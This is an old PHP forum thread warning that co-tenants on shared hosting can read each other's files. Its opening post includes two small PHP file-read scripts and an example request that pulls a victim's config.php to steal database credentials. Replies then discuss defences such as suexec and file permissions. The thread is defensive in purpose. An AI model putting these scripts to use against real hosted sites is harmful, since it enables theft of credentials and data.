Security in shared web servers! be careful: everybody hack

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

sanbad
Forum Newbie
Posts: 4
Joined: Tue Jun 07, 2005 2:17 am
Location: Iran

Security in shared web servers! be careful: everybody hack

Post by sanbad »

Hi

If your php portal install in a shared server you must be careful.
Other user that resident in your server (he has a hosting account on your server)can hack your portal!

How he can hack your portal?

By this script(script 1):

Code: Select all

<?php
if (isset($a) )
{
echo implode("", file("$a"));
}
?>
And by other one(script 2):

Code: Select all

<?php

    header('Content-Type: text/plain');
    readfile($_GET['a']);

?>
By these scripts , a user that resident in your server, can get your file or your code for exam he can get your config.php and see your database user & pass & name and down your data!!!

1- hacker must know your ID in your hosting so he recall one of php files that belong your portal in his browser:
for example:

Code: Select all

http://www.yourwebsite.com/forum/includes/functions.php?anyfunctionIntegerArgument=text
after this requesting; he see any error report like this:

Code: Select all

/home/yourID/public_html/forum/includes/functions.php  error 607 in line 563
Now he find your ID

2- Now he use one of these script for exam script 1 like in this case:

Code: Select all

http://www.hackerWebsite.com/script1.php?a=/home/yourID/public_html/forum/config.php
then he watch page source and read your db config informations!

3- by using a simple script he can download your db or he can write in your db and …
he can install the same portal and edit and change some code then he can use your encrypted-admin-password and login some times and…

how we can solve this problem?

1- we must add this codes to prologue of all php files:

Code: Select all

ini_set('display_errors', 'Off');
    ini_set('log_errors', 'On');
so hacker can not find your ID. And you can see error-log in Cpanel of your linux hosting.

2- You must rename your config.php file and edit all php file which include or require config.php file. Then you must encrypt these files by using zend-phpencoder or any other encoder programs.
So if a hacker find your ID he will not find your db config file

3- or using a dedicated server only for own.


In phpnuke if using nuke sentinel and IP-trakcer be on then all users' usernames and passwords ( even admin) insert in nuke_nsnst_tracked_ips !!!

So nuke owner or a hacker can see users password.

If you want register in portals you must use different password.
If your password is equal with your other important thing for exam equal with your email pass or domain-panel pass or your bank account hacker or nuke website owner can access that!

In other portals, owner can change scripts codes and find your password.
User avatar
MarK (CZ)
Forum Contributor
Posts: 239
Joined: Tue Apr 13, 2004 12:51 am
Location: Prague (CZ) / Vienna (A)
Contact:

Post by MarK (CZ) »

I don't think that other account on the same server have rights to access my folders.
Maybe on some badly supervised servers.
AshrakTheWhite
Forum Commoner
Posts: 69
Joined: Thu Feb 02, 2006 6:47 am

Post by AshrakTheWhite »

you could just hash your password
User avatar
aerodromoi
Forum Contributor
Posts: 230
Joined: Sun May 07, 2006 5:21 am

Re: Security in shared web servers! be careful: everybody ha

Post by aerodromoi »

sanbad wrote:Hi

If your php portal install in a shared server you must be careful.
Other user that resident in your server (he has a hosting account on your server)can hack your portal!

How he can hack your portal?

By this script(script 1):

Code: Select all

<?php
if (isset($a) )
{
echo implode("", file("$a"));
}
?>
And by other one(script 2):

Code: Select all

<?php

    header('Content-Type: text/plain');
    readfile($_GET['a']);

?>
[...]
3- or using a dedicated server only for own.
Why would anybody in his or her right mind allow for snippets like the ones you've posted?
Shared hosting is always a compromise - but you have to validate user input nevertheless.

btw: As to your first script - you might want to take a look at http://de2.php.net/manual/en/ini.core.p ... er-globals.
User avatar
Chris Corbyn
Breakbeat Nuttzer
Posts: 13098
Joined: Wed Mar 24, 2004 7:57 am
Location: Melbourne, Australia

Post by Chris Corbyn »

It's been a known problem for some time. Hosts who know what they're doing should use CGI and suexec in order to get PHP running under the userid of the account holder, this way you can remove the "x" execute permission from /home/<yourname> for everybody except yourself.

It would probably be good measuer to CHMOD all you files to remove all permissions for everybody except yourself too if you are in a CGI/suexec setup.

I'm more than aware that some shared hosts could care less about such issues after having my own website filled with trojan code on a number of occassions before telling my company to get stuffed and getting a VDS instead :)
User avatar
Chris Corbyn
Breakbeat Nuttzer
Posts: 13098
Joined: Wed Mar 24, 2004 7:57 am
Location: Melbourne, Australia

Post by Chris Corbyn »

AshrakTheWhite wrote:you could just hash your password
That won't stop people getting your MySQL details. Even if you hashed that you'd have to use the hash to login so all it means is your password is the hash so it can still be stolen.
User avatar
phppage
Forum Contributor
Posts: 126
Joined: Mon Apr 24, 2006 1:47 pm
Location: West Yorkshire, UK

Post by phppage »

Ok, heard rumours about this but this is a worry. Would anyone have any further detailed documents regarding protecting sites from this? Would this be a worry on bluehost.com? Any penetration tests I could try without upsetting my hosting provider?
User avatar
Chris Corbyn
Breakbeat Nuttzer
Posts: 13098
Joined: Wed Mar 24, 2004 7:57 am
Location: Melbourne, Australia

Post by Chris Corbyn »

phppage wrote:Ok, heard rumours about this but this is a worry. Would anyone have any further detailed documents regarding protecting sites from this? Would this be a worry on bluehost.com? Any penetration tests I could try without upsetting my hosting provider?
Just check if PHP is running under your own userid:

Code: Select all

echo `echo \$USER`;
User avatar
Benjamin
Site Administrator
Posts: 6935
Joined: Sun May 19, 2002 10:24 pm

Post by Benjamin »

I was playing around on a shared host the other day actually in ssh.

Code: Select all

#>updatedb
#>locate [censored] | less
etc. etc..

I notified the admin, not sure they will do anything about it though.
User avatar
phppage
Forum Contributor
Posts: 126
Joined: Mon Apr 24, 2006 1:47 pm
Location: West Yorkshire, UK

Post by phppage »

d11wtq wrote:
phppage wrote:Ok, heard rumours about this but this is a worry. Would anyone have any further detailed documents regarding protecting sites from this? Would this be a worry on bluehost.com? Any penetration tests I could try without upsetting my hosting provider?
Just check if PHP is running under your own userid:

Code: Select all

echo `echo \$USER`;
I tried that , uploaded it to my website and ran it via a browser and it displayed nothing. What would that mean?
User avatar
phppage
Forum Contributor
Posts: 126
Joined: Mon Apr 24, 2006 1:47 pm
Location: West Yorkshire, UK

Post by phppage »

I get this when I try to access SSH.
SSH/Shell Access

For security reasons, shell access is not enabled by default. In order to activate shell access on your account, you will need to fax or mail a copy of your driver's license, passport or other photo id to customer service. You can fax it to +1 (801) 765-1992 or email it to support@bluehost.com
I guess thats encouraging.
User avatar
Chris Corbyn
Breakbeat Nuttzer
Posts: 13098
Joined: Wed Mar 24, 2004 7:57 am
Location: Melbourne, Australia

Post by Chris Corbyn »

Hmm... you can create a file using PHP, then FTP to the server and look who owns that file (i.e. "nobody" or "wwW" vs "<your name>").
User avatar
phppage
Forum Contributor
Posts: 126
Joined: Mon Apr 24, 2006 1:47 pm
Location: West Yorkshire, UK

Post by phppage »

I tend to get read access for Owner, Group and All Users all have read access but only owner has write access but nothing is selected for execute. However the owner is not defined?? This is using Windows standard FTP via Network places. Could I get more info do you think from a good ftp client?
User avatar
phppage
Forum Contributor
Posts: 126
Joined: Mon Apr 24, 2006 1:47 pm
Location: West Yorkshire, UK

Post by phppage »

Seems like I am covered. Thanks for your help though. Weight off my mind.

http://www.bluehostforum.com/showthread.php?t=1551
User avatar
RobertGonzalez
Site Administrator
Posts: 14293
Joined: Tue Sep 09, 2003 6:04 pm
Location: Fremont, CA, USA

Post by RobertGonzalez »

I am pretty sure that iPowerweb is still vulnerable to this. One of my clients got zapped a few weeks ago. I had gotten hit several times before moving away from them.
Post Reply